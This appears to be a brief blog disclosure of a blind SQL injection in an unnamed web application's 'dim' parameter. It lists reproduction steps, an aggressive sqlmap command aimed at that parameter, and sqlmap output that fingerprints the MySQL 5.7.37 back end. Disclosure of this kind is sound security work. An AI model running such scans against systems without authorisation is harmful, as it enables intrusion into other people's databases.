Description
- It was found that the application suffers from Blind SQL injection
Blind SQL Injection
Steps to Reproduce:
- Login to application
- Click on "Workspaces"
- Copy full URL
- Paste the HTTP GET request into text file
- Set the injection point to be in the "dim" parameter value
- Use SQLMap to automate the process
sqlmap -r request.txt --threads 1 --level 5 --risk 3 --dbms=mysql -p dim --fingerprint
[...]
[12:13:03] [INFO] confirming MySQL
[12:13:04] [INFO] the back-end DBMS is MySQL
[12:13:04] [INFO] actively fingerprinting MySQL
[12:13:05] [INFO] executing MySQL comment injection fingerprint
web application technology: Apache
back-end DBMS: active fingerprint: MySQL >= 5.7
comment injection fingerprint: MySQL 5.7.37
[...]
No comments:
Post a Comment